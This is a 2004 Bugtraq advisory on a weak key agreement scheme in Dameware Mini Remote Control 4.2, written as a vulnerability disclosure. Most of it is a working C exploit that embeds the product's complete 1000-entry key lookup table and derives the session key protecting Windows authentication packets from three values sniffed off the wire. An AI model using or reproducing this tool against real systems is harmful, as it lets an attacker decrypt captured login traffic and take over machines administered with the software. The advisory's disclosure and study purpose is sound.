Bugtraq mailing list archives
Dameware Mini Remote Control Version 4.2 – Weak Key Agreement Scheme
From: ax09001h <ax09001h () hotmail com>
Date: 30 Apr 2004 18:26:46 -0000
Title: Dameware Mini Remote Control Version 4.2 – Weak Key Agreement Scheme
Versions: Dameware Mini Remote Control Version 4.2
Vulnerability: The latest version of DamewareÂ’s Mini Remote Control System uses a weak key agreement scheme. The
scheme consists of the sharing of pointers into a fixed key lookup table. Both the client and the server have access
to a key lookup table (KLT) consisting of 1000 32-bit values. Prior to encrypting traffic the server sends to the
client a series of 32-bit integers, call it the key index table (KIT). For the sake of description lets call the
indices klt_idx[4], an array of 4 32-bit integers. The klt_idx are set as follows:
klt_idx[0] = KIT[100];
klt_idx[1] = KIT[4];
klt_idx[2] = 42;
klt_idx[3] = KIT[37];
The actual session key is then constructed as 4 32-bit integers, sk[4] as follows.
sk[0] = KLT[klt_idx[0]];
sk[1] = KLT[klt_idx[1]];
sk[2] = KLT[klt_idx[2]];
sk[3] = KLT[klt_idx[3]];
This of course produces 0-bits of security.
They proceed to correct the Electronic Code Book mode of encrypting other authentication packets using the above
constructed key using Blowfish in cipher block chaining mode with an IV = 0.
Exploit:
/*
dwgenkey.c dameware generate key program.
this function mimics the dameware
key generation algorithm used to
pass encrypted windows authentication
across between client and server
ax09001h () hotmail com
*/
#include <stdio.h>
#include <stdlib.h>
unsigned int KLT [1000] =
{
0x75A50CF3, 0x58509D61, 0x2352671F, 0x1C8694B4, 0x464A5B8D, 0x17F76F5D,
0xF7CBFF22, 0xDEE4BBE7, 0x87C577D7, 0x7DE79418, 0x63099A11, 0x7FB4509,
0xF8AE103C, 0xB8956F47, 0xA788EF1E, 0xBC1B225E, 0x1F6F1B29, 0x48A20FA2,
0x73764E64, 0x9B1BAFE5, 0xC74859E3, 0xF34C3973, 0xD782E7EB, 0xBC2B83CD,
0x333141DD, 0x78F91C49, 0x8C3C3C62, 0x430F1CA6, 0xF55CB058, 0x5474C05,
0x2AD30B5F, 0x47B3AA97, 0xD1DE6ED1, 0x927DD4C0, 0x9043C47A, 0xCFA8D725,
0x8F2A794B, 0x916758FC, 0x5C21B4C0, 0xAF5D6F28, 0x2E5B2EE9, 0xA4772762,
0x5C35CBA8, 0x359EE4E1, 0xA778F423, 0xB4EB8D16, 0x846238D7, 0x9B9C7F88,
0x708517E4, 0x8346D4FA, 0xE131395B, 0xB95282FD, 0x5434DB89, 0x2B00247B,
0xAB5A14EC, 0x6A74879C, 0x1DF2EDE1, 0x9E9CBAD8, 0x6E4F97D5, 0x8910C7AE,
0x6C76CD48, 0x4C5C0FDE, 0x1C408E04, 0xB1DC5C7B, 0xB226FFC5, 0x5C1D1096,
0xA92D865A, 0x48D0FF4C, 0x87F9BF23, 0xF5E864C9, 0x80154A84, 0x38987089,
0xA4F0EE08, 0x1630ADB9, 0x99F564BD, 0x69394C04, 0xC790C3E5, 0xF0E9E87E,
0xB9F8AF1C, 0xF797E46C, 0x5F2F339D, 0xB792AB5F, 0x462050F7, 0xF922EDBD,
0xD8EC238B, 0xDE30DFB6, 0xCAE883E7, 0x77748FED, 0x681AB4C8, 0x1610F821,
0xAA69288, 0x88E41CCD, 0x81BEA8DB, 0x56236206, 0x3FF596A7, 0x7EB79B23,
0x2939A1A1, 0x59F56A53, 0x175ACD1D, 0x9D442B3E, 0xCB0D47E3, 0x81BD054E,
0xC5B5AED3, 0x420BFE41, 0xBA3446BE, 0x1F8AC66A, 0xB12D2A33, 0xD52EB9F3,
0xFD572127, 0x1ED5C98C, 0x891E0430, 0x263E5AC2, 0xFCEBC8D7, 0x84ACE5F7,
0x1093FA43, 0xFD07DD1D, 0xC4C91870, 0x1952527F, 0xF77D5A1B, 0xAA6E479B,
0x26BBC409, 0x1B694B08, 0xAB1246FB, 0x413D0BB5, 0xAC6A46C9, 0x79217008,
0x315A6C60, 0xA18609FB, 0x37C4221C, 0xD25D2622, 0x6CA0CC6F, 0x6E3A0EDC,
0x9EA7C082, 0x8F22351D, 0xC58AEC76, 0x8A59BFEF, 0x98C5888F, 0x5EA76365,
0x7E8B04D1, 0x44B5282D, 0x72547943, 0x6B49B88, 0xD8644EF3, 0x4DCA10BE,
0x6666892F, 0xAC773084, 0x85A718BE, 0x9C648D4A, 0x3D6787F1, 0xED2DB263,
0xCB0129DC, 0xAFB919E3, 0x2385872E, 0xE119C18F, 0x8F4ABB22, 0x7A153138,
0xF4537078, 0x7B535CE4, 0x17E50602, 0x86AF582E, 0xA96A418E, 0x2E464810,
0xEC0F2BF1, 0xD7500E84, 0xFB8248CB, 0xB6A0934D, 0x45A2F984, 0xDBB687C0,
0x4FADD405, 0x19E5677B, 0x327DAB10, 0x6E82DD9C, 0x28B99205, 0x627FB642,
0x13266166, 0xAC1D207E, 0x6757CB08, 0x75A551EE, 0xD8D440C7, 0xF9E198F7,
0xDCD6C5DD, 0x9E91F814, 0xD411C844, 0x7CD5073B, 0x711214E6, 0x419766DA,
0xE5209EFB, 0x1A4E0702, 0xD8B6C71, 0xDA3EAE89, 0xA1A00078, 0xB55B5C3E,
0xE8EB204C, 0x9092BCB5, 0x753F8AA, 0x25DBC9DC, 0x75855E4, 0x5486F63D,
0xE21C3971, 0x206B068A, 0xAEF41F63, 0xD6C45A84, 0x55CA81BF, 0x245EE02E,
0x20A277EC, 0x2688325E, 0x5CC597BC, 0xC3C6D5, 0xE10FA336, 0x1E038ED1,
0xD017BAA1, 0x60F3B322, 0x5C4B7883, 0x37C8827F, 0xA4401AB8, 0x3F0D1244,
0x599287A9, 0x9FEBF317, 0x551B9574, 0x7B4490D6, 0x5167A51E, 0x75144C86,
0xB58FA84E, 0xC2EFCD51, 0x62B1B44C, 0xF20CB94C, 0xFB1C3022, 0x5D9FA80E,
0x9723B02E, 0x9BEB9BC0, 0x7D7D7D7C, 0xBBECAC8, 0xEE7C8FD6, 0x84E7032B,
0x983051AE, 0x69E077E1, 0x4215FF00, 0x941F1398, 0x899CE29, 0x34FD70CC,
0x151A4D02, 0x625EFD60, 0xCC9FC987, 0x5854F10C, 0xFDE6B36A, 0xE50E1F0,
0x7D1AC470, 0x75CF6430, 0x691B188E, 0x861F8385, 0x899781B9, 0x453BBB9,
0x33CCF322, 0x5BC03054, 0x1C8F4BCE, 0xB20EAD6C, 0x8FC48E15, 0xC650FD0C,
0x5F9D8872, 0xD100E234, 0xCEBB178A, 0x20F2529F, 0x912889F8, 0x58EDD3F6,
0x27F8EADA, 0xE501536D, 0xB8635884, 0x5525004, 0x9B6EBF24, 0x4E223C61,
0x67C61B28, 0xBC8D0315, 0x186A6C99, 0xDAD6D525, 0x1C412AD1, 0x86B268E4,
0x47B5AC03, 0x72506EEA, 0xCDF419F9, 0x9E062DB4, 0x236F81F7, 0xCF4BFFDF,
0xF38B27B8, 0x17A2E942, 0xBDF70DFD, 0xB3ED596B, 0xD24583F5, 0x7D25304E,
0x209350C6, 0xD171038E, 0xA7F746D2, 0x4DD38415, 0x7F7FB4D9, 0x60F193B5,
0xAF480C11, 0x23E73939, 0x77853419, 0x835D55CE, 0xBCA629D0, 0xCDDA82C9,
0xC6EC6933, 0xFD779112, 0x3477605F, 0xD56B9610, 0xAAB266A6, 0xF53E8558,
0x61D7B1D6, 0x5C5ADCD4, 0x9C4C685B, 0x47D4C3FE, 0x956BB743, 0x7BEAB72C,
0xEE0CADD4, 0x844F5B3D, 0xF6B76242, 0x7A48638E, 0x7A9FCA83, 0x8C5CFCB8,
0xC5C0200F, 0x458E401B, 0xD0232077, 0x96EC41FB, 0x818E1178, 0xF039C809,
0xD2CBF2F3, 0xD710BBDF, 0xAF373B6F, 0xECFF5238, 0xA7A90C76, 0xB291F856,
0x76378535, 0x8AC59C93, 0xCC083868, 0x10B3DCBD, 0x726A72D1, 0xCAA8BABB,
0x9C519F9B, 0xE57B91C2, 0x3938CA06, 0x8AB0A001, 0x81154FB1, 0xB8B999D9,
0xB385C69F, 0xF62E1A24, 0xE352A419, 0x52719D67, 0x23D0D6E4, 0xD143E405,
0x17D114A3, 0x7A590816, 0x4FB4C683, 0x96DE0346, 0x1C96B2B3, 0xE0FE73B,
0x51FA1A82, 0xB5A325A9, 0x7244452E, 0x88411A62, 0x10F37E47, 0x80E9235D,
0x8734E043, 0x7287A203, 0x7D322B79, 0x59F16B1A, 0xB715C112, 0x7F930942,
0xE31AF1D4, 0xC8312072, 0xB949A15E, 0xE5A0942A, 0x21C62B9F, 0x3A8E4A04,
0xA7B50B0A, 0xC7481BF1, 0xF1E2DB36, 0x8120EAAB, 0x9364D482, 0x481D5B4D,
0x58460CE7, 0x6E1FE474, 0xCB180DE1, 0xF1FEA961, 0x6E663723, 0x7F713621,
0xC421154, 0x14B18B19, 0xEB87F422, 0xE2100D60, 0x65ACBC65, 0xC1EA51EA,
0x9DD0DF6A, 0x9AE68741, 0x1F5DEFA2, 0xA530969B, 0xB746D9D5, 0x1339A116,
0x7C07054, 0xE118D5CE, 0xF13EE7DA, 0xA53EBE1E, 0x3864BC9, 0x27C3B146,
0xF2057DFD, 0x5CDF8621, 0x24BBFA19, 0x9C207686, 0xFDA8C0B4, 0x7BC12DE,
0x3B6E6ABD, 0xEE88CB8E, 0xF11F5F31, 0x17C36F90, 0x62545D14, 0x23BAA683,
0xBCF05635, 0xEE710A20, 0x88D5C4C1, 0x45D242BC, 0x2618DAFA, 0x71C24008,
0xEFF1F3E8, 0x90537430, 0xF941923C, 0xE806B643, 0x1E8F4C81, 0x98E93630,
0x90ECFFE3, 0x422C75E1, 0xA19D77D3, 0x99D16114, 0xCA4380C8, 0xAF2A72E8,
0x71114704, 0x97EBE3E0, 0x90D614F6, 0xF5408B6D, 0x841EE866, 0x35699601,
0x9C004E8F, 0x5ACAC96F, 0xF1D181D3, 0xB1DB1F66, 0xAD36B6E6, 0xA3C182A3,
0x6E159D3A, 0x4860F191, 0xA22499C0, 0xA8DD59AB, 0x5E729975, 0x5285CEC2,
0xF0505102, 0x87294945, 0x17EE75CA, 0xD5E97597, 0xC36CD9A, 0xA45A497,
0xA1215DDF, 0x41C84062, 0xC1C6536E, 0xE8AEF5BF, 0xBF109C2E, 0x402A1D1C,
0x67DEDD8, 0x97061C4A, 0x936BACD0, 0xC34A5C19, 0xF40F90FE, 0xD7B03D1,
0xD7C91313, 0xE03CF91D, 0x7176F3D4, 0x29440055, 0xBBB3A31C, 0x70F5A3C2,
0x76E7D2A6, 0x536501F, 0xC77CA12B, 0x5E6E2842, 0x9896F26C, 0x2BC45D27,
0xE2FF89C7, 0x11FBC8C, 0x252652BD, 0x61AA26A4, 0xF3DF28A, 0xAFB90C39,
0x3C5BCF12, 0xE765B3A5, 0x6EBF07FE, 0x2630C3A2, 0xC0F995BC, 0x27677058,
0x49E5FA9C, 0x3B66C518, 0x7654283D, 0xB8305341, 0x72E94CF, 0x3E181088,
0x9F721122, 0xC536D545, 0x8BD48FE7, 0xA0899C0F, 0x950D4B9C, 0xCDFA8F86,
0x9D1180B5, 0xB35F2925, 0x85CA36ED, 0x9FA58055, 0xEF0F31F9, 0xA5FADD9C,
0x2ABB9F51, 0xC90E060A, 0xA0304ED8, 0xB6462678, 0x5ECAB5CB, 0x9BFA4C0C,
0x1644830E, 0xC210F8D0, 0x3139A59B, 0xDE090D20, 0x89960C79, 0x489E6E7D,
0xC3650D3F, 0x832E301C, 0x3EC2DEC2, 0x8C1BEFD2, 0x15374CE3, 0xA95682A4,
0x694B8053, 0x8C003F9E, 0x3C792799, 0xC31B2A4B, 0xFD6F5781, 0x544F000B,
0x151F60A6, 0x224E32E5, 0x9AD498E6, 0x8B74BFCC, 0x85C8C5DA, 0x221D7990,
0x66C4A629, 0x1281D60A, 0xE0178028, 0x44E6DEBD, 0xBAAB265, 0x384C4B56,
0xDC2F9A2C, 0x470211A4, 0xCBD167C3, 0xF5EED383, 0x1E1ED189, 0x29D803F9,
0xC144F12E, 0x9AC2B5AB, 0xC3DB04A2, 0xC513EB91, 0x71DCF85C, 0x343B65E3,
0x6B32E419, 0xAFFC770D, 0xBCE86B4D, 0x9AA723E4, 0x611A0E70, 0xFA441603,
0x3171887D, 0x5AC8ABCD, 0x45A5A2E4, 0xA47AFB05, 0xF1FBA2F1, 0x1F7FA634,
0x95F72F6A, 0x17E27035, 0xC91082D7, 0x5F2BEE2F, 0x68EE3EA8, 0xD2238F52,
0xD622F757, 0x2CE5FE15, 0x4DD2E862, 0xD8B78679, 0xA068E1E3, 0x9DA3764,
0xA46DC043, 0xEF5A319E, 0x3CA47D7, 0x15D66FBD, 0x70FD11C5, 0xEB93FAE7,
0xE0C76863, 0xCA8DB56B, 0x549B7A6D, 0x7830B60E, 0x63EC6EA1, 0xC5F8C700,
0x25F6631D, 0x81C74AA6, 0x1FEBAAA6, 0x50FACED0, 0xF3B16C0C, 0x42D24E7D,
0x87FAB7B4, 0x8998222D, 0xCF13B716, 0xD77799C7, 0xF19B6249, 0xCC56A6E6,
0x3D87AC7E, 0x2A73259B, 0x5503BDFD, 0xD95F05F1, 0xC01BCD8B, 0x6F9C96E2,
0x6B2D997, 0xB3F54B81, 0x3139AC71, 0x504DC220, 0x9D4C8848, 0xFAB47FBF,
0xF910278A, 0x1AAD13D7, 0x667DC201, 0x2A2AE786, 0x845C31FA, 0x27F4E75,
0x413D1796, 0x9236D7BC, 0x8FAC3425, 0x866DC291, 0x97796BE4, 0x3581CDF,
0xA313B372, 0x57907BA0, 0x981BE778, 0x67DA3DF6, 0x947D9EC1, 0xCFA65CA6,
0x6261BF74, 0xD818DCB0, 0x30CBA2D1, 0x1A41B299, 0x33317112, 0x424A6EB6,
0x516FA0C5, 0x1B0EBEDC, 0xDDAB9664, 0xCBDE0912, 0x8E567CFA, 0xA1C9DAEB,
0x1C7DB358, 0xA144F1FE, 0x2B7FEE15, 0xB5CA6B77, 0x2B1655B3, 0xFF3D846B,
0x2B0B907A, 0xC0948E5C, 0x608A1725, 0x2FF6781C, 0x555C1AAC, 0xDB70AD3E,
0xDFD488CA, 0x2170C025, 0x576C15E7, 0x5F447947, 0x30B8108F, 0xBB9ADE84,
0x8808C71A, 0xB760EA1F, 0x4E503018, 0x534BA5B5, 0xCDF5FE07, 0xEC48167F,
0xD1E7227A, 0xCD998A1, 0xE754F192, 0x2727BFFF, 0xBFB0694D, 0xF454B618,
0x63EBFF6, 0x30BD09D0, 0x927F98B2, 0x6F96ED41, 0xC249BFB1, 0x8E07ED96,
0x6D3B63AE, 0xC661C79A, 0x574D1947, 0x691AC06A, 0x1241A695, 0xDA814574,
0xF520C090, 0x7AAFF6DF, 0x6314F55A, 0x99BF992E, 0x4C2350AA, 0x16C970F2,
0xBC5DAF3D, 0x948FEE79, 0xCF038D84, 0x94916A6F, 0x67C9C446, 0x769D41FC,
0x7AB8FC6B, 0xAC88CDC6, 0x2632E0F2, 0x7A39D045, 0xE07D60C3, 0x627F0F1B,
0x6C9E9B6F, 0x5443B96A, 0xB42AEFB6, 0x7D971F39, 0x1E543216, 0xAB1F0A,
0x4B0E8966, 0xBE389C53, 0xE8143B78, 0x845EEA38, 0x1BC4E0C1, 0xC33854ED,
0xEBE30DBC, 0xAE0FFAD8, 0x545B28DB, 0x64CB5928, 0x516227C9, 0xDA7DED1B,
0x60957017, 0xEF42F6C4, 0xD1D44B1A, 0x6E9DCDB0, 0x8089B1C8, 0x78229E35,
0xE65C19DF, 0xBE4926F8, 0x22F282DB, 0x1DAD0725, 0x1F1E94A5, 0xE1F97ACD,
0x7EA0006F, 0x94F6FBDD, 0x26214BED, 0xFC7FF0CC, 0xA2393542, 0xB472E61E,
0x301E470, 0x36FD7EE5, 0xF179CB04, 0x18CC9785, 0x2E0F60B2, 0x13112B9B,
0x21CE96F9, 0xCF50766C, 0x420F7FBE, 0x3062489, 0xA2E5956D, 0x38AF92C9,
0x826DB438, 0xCA1D08C7, 0x2CAA1940, 0xCCCDF1C, 0x9C3FE51D, 0x1ECDC7D8,
0x909C80DE, 0x646BFFA9, 0x6318213D, 0x32C14EFF, 0xC8351460, 0x6D81B09,
0xC3BA2047, 0x4078D5B1, 0x7AF40C50, 0x7128296, 0xB57DE4BE, 0xBD35598,
0x2256C607, 0xB6177952, 0xF276EF63, 0x55D787AF, 0x2267BE3B, 0x48B1B069,
0x5CF704D4, 0x4C1B3376, 0xDF687016, 0x68B38FE2, 0x19E808B4, 0x2FFF302B,
0x78BD0181, 0xBC4A03F0, 0x98562262, 0xB9797F02, 0x1E7B17D3, 0x61B031D1,
0x8E69A1F8, 0x32863D7E, 0x8140AA57, 0xD42FB27E, 0x825645B2, 0x7E0AC685,
0x1752B306, 0xEF07F2F7, 0xF031981C, 0xA061064D, 0xE118F8AB, 0xCCE37EF9,
0x6AEBFCF7, 0xEEED8568, 0x98A86406, 0x6B7D3AAA, 0xAD068483, 0x2E71AAF2,
0x1800DB2E, 0xA98F5949, 0xE111A890, 0x17E02EB3, 0xC6B72970, 0x15067E3E,
0xB2291D61, 0x6008098F, 0xDAD360FF, 0xD19E95D, 0xBEFD0EC7, 0x5F4C9183,
0xCB5EAB77, 0xC6A1FB76, 0xD71F95D2, 0xFC7FDB6E, 0x80DD91AB, 0x8E322B21,
0xAAE68069, 0xC2CEB8A5, 0xC89D1CA1, 0x931577D8, 0x4D6F1725, 0xC3E0EC5A,
0x7F94E8FB, 0x3E008B9C, 0x1DC1680D, 0xF99F3782, 0xFD54CD8F, 0x97722074,
0xE0F06DB7, 0xF9B44EE8, 0xFBF70D53, 0xDF3B605F, 0xB6CDC64D, 0xD5CC9449,
0x75A2DC1A, 0x62C4D3AE, 0x6FB02ED3, 0x55F97BF8, 0x86179194, 0x67488E2,
0x1071C487, 0x5D196F3C, 0x9FCDBA5E, 0x994036B, 0x538C2B87, 0xE3CA84F4,
0xE6D29642, 0xAA8E0B45, 0xF3557176, 0x403E0041, 0xF1056A7D, 0xB163CC68,
0xB00F9A47, 0x6E13B87, 0x93C25E4F, 0x4BFCEC42, 0xD4AAE81, 0x9FA016C,
0x8A842986, 0xDC301A3B, 0xA43D96F1, 0x1DFB9302, 0x4D9F9AAE, 0x6A7416FF,
0xCF2E7C59, 0x76478C25, 0xAD4A317E, 0x8985000D, 0x38FED22B, 0xFD0944A9,
0xD2A319D1, 0x9D9ABC55, 0x2A1F76B0, 0x9BCDAA0D, 0x2DE5847, 0xDF44583C,
0xF4CEBE0F, 0x6733F2CD, 0x5F8A8DA5, 0x4526D975, 0xB6E458B7, 0x4D2BB1A6,
0x137AA2C6, 0x6DDCFC23, 0xA41CE8B6, 0x4A442E7E, 0xFB7A0A5, 0xF7808F43,
0x5D10DDD6, 0xA52D6396, 0x61574048, 0x8923CBA2, 0x6436DD12, 0x49266343,
0xF1787AAB, 0xC467FB1A, 0x25278A4B, 0x2181A43C, 0xC4EAF160, 0x88A9E6BB,
0xC7AF0933, 0x8002BA84, 0xB134654, 0x4A015A8E, 0xEC16E6AF, 0xEC154BE3,
0x10FE786A, 0x8F5EA3E7, 0x1A92D7C4, 0xD90FE65A, 0x6CF77EA3, 0x394EB8F9,
0x573B2AF9, 0xD6396AFA, 0xCC79F56, 0xC36AA7DB, 0x88B6126E, 0x3BBD5F44,
0xA8086DC7, 0x9437E86F, 0xA8A72E5F, 0x204CC584, 0x508AAC96, 0xEACC6EF1,
0x981E7A1A, 0xA16DF863, 0xAA9FD0B9, 0x22F6D8DA, 0xA05A7581, 0xD9782911,
0xCCBDFFD7, 0x7E3C9F4E, 0x96FC6F3D, 0x7113F1FC, 0xD312E7BD, 0x6AD91B0F,
0x394E21FA, 0x47F135EE, 0xA24E4FE5, 0x2C7A682E, 0x185161A9, 0x6AF00259,
0xD411424D, 0xB207A9E1, 0xF4E482E7, 0x6173F9FE, 0xE3CEC249, 0xB63D392B,
0x3FE5BEDF, 0x82C2E736, 0x69FF3BA2, 0x9D219633, 0x8DA0F96F, 0xDFCCCB9,
0xC4A6A06F, 0xBC536DF7, 0xE76CC1F, 0x452F4BD1, 0x1BC9BA19, 0x4427617C,
0x4410511D, 0xD2B3643B, 0x90066BE6, 0x9B03705C, 0xF144AE, 0x5017F6E5,
0x2EC8DA0, 0xC4733AAE, 0xD2CB991D, 0xFF695547, 0xE662D331, 0xA374917C,
0xB53B62CC, 0xBF135D1, 0x3240CEBA, 0xB406298B, 0x5065FE42, 0x9BB538CC,
0xC89AF46A, 0x97FB692D, 0xB0123130, 0xED5BFFB1, 0x2CC09D9, 0x68E4E060,
0xB117D6E7, 0xBA9CE7B3, 0xB731559B, 0x876FF1D
};
int usage()
{
printf("USAGE: dwkeygen INDEX0 INDEX1 INDEX2\n");
printf("\t INDEX0 is the hexidecimal value of 101st unsigned int\n");
printf("\t in the server to client message that preceeds\n");
printf("\t the encrypted windows authentication packets\n");
printf("\t INDEX1 is the hexidecimal value of 5th unsigned int\n");
printf("\t in the server to client message that preceeds\n");
printf("\t the encrypted windows authentication packets\n");
printf("\t INDEX2 is the hexidecimal value of 38th unsigned int\n");
printf("\t in the server to client message that preceeds\n");
printf("\t the encrypted windows authentication packets\n");
printf("OUTPUT: dameware encryption key\n");
return 0;
}
int main(int argc, char **argv)
{
int i;
unsigned int sk[4], klt_idx[4];
if(argc!=4) { return usage(); }
klt_idx[0] = strtol(argv[1], NULL, 16);
klt_idx[1] = strtol(argv[2], NULL, 16);
klt_idx[2] = 42;
klt_idx[3] = strtol(argv[3], NULL, 16);
for(i=0;i<4;i++){
sk[i] = KLT[klt_idx[i]];
printf("%08X ", sk[i]);
}
printf("\n");
return 0;
}
Recommendation: The general recommendation is to use another software package. This program seems to be riddled with
poor software practices and a lack of understanding of security principles.
Current thread:
- Dameware Mini Remote Control Version 4.2 – Weak Key Agreement Scheme ax09001h (Apr 30)